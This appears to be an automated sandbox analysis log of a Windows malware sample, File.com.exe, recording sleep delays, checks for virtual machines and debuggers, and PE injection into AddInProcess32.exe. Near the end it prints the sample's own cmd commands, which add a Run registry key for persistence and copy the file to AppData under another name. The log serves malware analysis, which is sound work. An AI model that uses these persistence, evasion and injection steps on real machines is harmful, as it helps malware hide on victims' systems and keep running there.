Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596200s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -595000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -594890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -594781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -594672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -594562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -594453s >= -30000s

Source: C:\Users\user\Desktop\File.com.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598441	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598315	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598189	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598842
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594453

Source: File.com.exe, 00000000.00000002.1839360978.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, File.com.exe, 00000000.00000002.1847264743.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, xxlooa.exe, 00000010.00000002.2574650182.0000000004495000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: xxlooa.exe, 00000010.00000002.2574650182.0000000004495000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 806010189GSOFTWARE\VMware, Inc.\VMware VGAuth
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcd
Source: AddInProcess32.exe, 00000013.00000002.2938255504.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\File.com.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\xxlooa.exe

Code function: 16_2_088E87C8 CheckRemoteDebuggerPresent,

16_2_088E87C8

Source: C:\Users\user\Desktop\File.com.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 19_2_05699398 LdrInitializeThunk,

19_2_05699398

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 19_2_00413639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

19_2_00413639

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

19_2_00413B7E

Source: C:\Users\user\Desktop\File.com.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_00413639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		19_2_00413639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_004123F1 SetUnhandledExceptionFilter,		19_2_004123F1

Source: C:\Users\user\Desktop\File.com.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41B000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 426000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AAA008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41B000
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 422000
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 426000
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 9D4008

Source: C:\Users\user\Desktop\File.com.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 21 > nul && copy "C:\Users\user\Desktop\File.com.exe" "C:\Users\user\AppData\Roaming\xxlooa.exe" && ping 127.0.0.1 -n 21 > nul && "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 17	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\xxlooa.exe "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Users\user\Desktop\File.com.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
